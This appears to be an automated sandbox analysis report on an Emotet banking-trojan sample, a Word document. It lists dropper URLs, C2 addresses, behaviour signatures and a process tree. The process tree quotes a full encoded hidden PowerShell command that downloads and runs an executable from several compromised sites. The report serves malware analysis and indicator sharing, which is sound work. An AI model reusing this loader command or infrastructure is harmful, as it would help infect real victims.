Overview

overview

10

task1

 

10

task2

 

10

Analysis

  • max time kernel
    113s
  • resource
    win7v191014
  • submitted
    21-12-2019 20:56

Sharing

Copy URL
Twitter E-mail

General

  • Target

    Docs_93eed51374a6f51f6b83fa343b69c5d3.1

  • Sample

    191221-fd2yq75q46

  • SHA256

    ad253e6647362deb3c0d03399e7f512ef78a155763d032eab642d24c4bcec1b8

Score
10/10
trojanbankeremotet

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://diwafashions.com/wp-admin/mqau6/
exe.dropper

http://designers.hotcom-web.com/ubkskw29clek/qnpm1p/
exe.dropper

http://dixartcontractors.com/cgi-bin/nnuv/
exe.dropper

http://diaspotv.info/wordpress/G/
exe.dropper

http://easyvisaoverseas.com/cgi-bin/v/

Extracted

Family

emotet

C2

24.181.125.62:80

98.156.206.153:80

173.21.26.90:80

108.61.99.179:8080

165.227.156.155:443

159.69.89.130:8080

167.99.105.223:7080

5.196.74.210:8080

200.7.243.108:443

183.102.238.69:465

64.147.15.138:80

85.152.174.56:80

59.148.227.190:80

62.75.187.192:8080

174.77.190.137:8080

87.106.139.101:8080

173.247.19.238:80

2.38.99.79:80

178.210.51.222:8080

209.141.54.221:8080
rsa_pubkey.plain

Signatures

  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Drops file in System32 directory 6 IoCs
  • Modifies registry class 136 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

    trojanbankeremotet
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs
  • Suspicious behavior: EmotetMutantsSpam 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_93eed51374a6f51f6b83fa343b69c5d3.1.doc"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of FindShellTrayWindow
    • Drops file in System32 directory
    • Suspicious behavior: AddClipboardFormatListener
    PID:1520
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABWAGgAZAByAGkAZwBwAHQAeQA9ACcARwByAG4AcgBsAHYAagBnAHEAdwBpAGUAbAAnADsAJABRAGgAeQBtAGQAZAB0AHAAdQAgAD0AIAAnADgAOAAyACcAOwAkAFEAeQBmAHIAZgBhAHgAcABzAHAAeQA9ACcAQgBuAGIAbwByAGEAZwB6AGwAcgAnADsAJABLAGEAdABxAGgAcwByAGcAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFEAaAB5AG0AZABkAHQAcAB1ACsAJwAuAGUAeABlACcAOwAkAE8AYQBqAG4AZAByAHUAbAByAD0AJwBTAHoAdABnAHUAeAB6AHcAdwBrAHUAbwAnADsAJABGAHUAegBqAGQAcwBnAHYAZQA9ACYAKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBFAFQALgBXAGUAYgBDAGwAaQBFAE4AVAA7ACQAVgB4AHkAegB5AHYAeQBzAGYAbQA9ACcAaAB0AHQAcAA6AC8ALwBkAGkAdwBhAGYAYQBzAGgAaQBvAG4AcwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AbQBxAGEAdQA2AC8AKgBoAHQAdABwADoALwAvAGQAZQBzAGkAZwBuAGUAcgBzAC4AaABvAHQAYwBvAG0ALQB3AGUAYgAuAGMAbwBtAC8AdQBiAGsAcwBrAHcAMgA5AGMAbABlAGsALwBxAG4AcABtADEAcAAvACoAaAB0AHQAcAA6AC8ALwBkAGkAeABhAHIAdABjAG8AbgB0AHIAYQBjAHQAbwByAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBuAG4AdQB2AC8AKgBoAHQAdABwADoALwAvAGQAaQBhAHMAcABvAHQAdgAuAGkAbgBmAG8ALwB3AG8AcgBkAHAAcgBlAHMAcwAvAEcALwAqAGgAdAB0AHAAOgAvAC8AZQBhAHMAeQB2AGkAcwBhAG8AdgBlAHIAcwBlAGEAcwAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAHYALwAnAC4AIgBzAFAAbABgAEkAVAAiACgAJwAqACcAKQA7ACQAUAB1AHcAcQBvAGYAZwBoAGwAPQAnAE4AYgBwAHgAZABuAHUAZAAnADsAZgBvAHIAZQBhAGMAaAAoACQASABkAGkAawBjAGUAdgBiAHUAYwB6AGgAYQAgAGkAbgAgACQAVgB4AHkAegB5AHYAeQBzAGYAbQApAHsAdAByAHkAewAkAEYAdQB6AGoAZABzAGcAdgBlAC4AIgBkAG8AdwBOAEwAbwBhAGQAYABGAGAASQBsAGUAIgAoACQASABkAGkAawBjAGUAdgBiAHUAYwB6AGgAYQAsACAAJABLAGEAdABxAGgAcwByAGcAKQA7ACQAUAB5AHUAbQBiAG0AdgBiAHYAdAA9ACcASABuAHgAeQB2AGMAcwBuACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQASwBhAHQAcQBoAHMAcgBnACkALgAiAGwAZQBuAGAAZwBUAGgAIgAgAC0AZwBlACAAMgA4ADQAMQAxACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABhAGAAUgBUACIAKAAkAEsAYQB0AHEAaABzAHIAZwApADsAJABHAGcAdwBqAHkAcwB4AHoAPQAnAFgAYQB2AGMAZABtAHMAbABnAHAAeAAnADsAYgByAGUAYQBrADsAJABVAGIAYQBmAHIAcwBrAGYAeQBiAD0AJwBHAGYAYwB4AGkAeQB1AGEAbQBqAG4AJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUgBwAGEAYwBlAHgAZQByAHUAYgBpAHgAbgA9ACcAQQBrAHoAeQB5AG8AeABoAHAAJwA=
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Drops file in System32 directory
    • Suspicious use of WriteProcessMemory
    PID:1696
    • C:\Users\Admin\882.exe
      "C:\Users\Admin\882.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1164
      • C:\Users\Admin\882.exe
        --2f98b90
        3⤵
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious behavior: EmotetMutantsSpam
        PID:456
  • C:\Windows\SysWOW64\sitkamethods.exe
    "C:\Windows\SysWOW64\sitkamethods.exe"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:892
    • C:\Windows\SysWOW64\sitkamethods.exe
      --21331af0
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious behavior: EnumeratesProcesses
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious behavior: EmotetMutantsSpam
      PID:1108

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\882.exe
    Download Submit

  • C:\Users\Admin\882.exe
    Download Submit

  • C:\Users\Admin\882.exe
    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1774239815-1814403401-2200974991-1000\0f5007522459c86e95ffcc62f32308f1_18654976-c7db-4a1a-8859-070035d242d5
    Download Submit

  • C:\Windows\SysWOW64\sitkamethods.exe
    Download Submit

  • C:\Windows\SysWOW64\sitkamethods.exe
    Download Submit

  • memory/456-11-0x0000000000300000-0x0000000000317000-memory.dmp

    Filesize

    92KB

    Download

  • memory/456-12-0x0000000000400000-0x00000000004AA000-memory.dmp

    Filesize

    680KB

    Download

  • memory/892-14-0x00000000003E0000-0x00000000003F7000-memory.dmp

    Filesize

    92KB

    Download

  • memory/1108-16-0x00000000003C0000-0x00000000003D7000-memory.dmp

    Filesize

    92KB

    Download

  • memory/1108-17-0x0000000000400000-0x00000000004AA000-memory.dmp

    Filesize

    680KB

    Download

  • memory/1164-8-0x0000000000290000-0x00000000002A7000-memory.dmp

    Filesize

    92KB

    Download

  • memory/1520-3-0x0000000009080000-0x0000000009084000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1520-0-0x00000000063B0000-0x00000000063B4000-memory.dmp

    Filesize

    16KB

    Download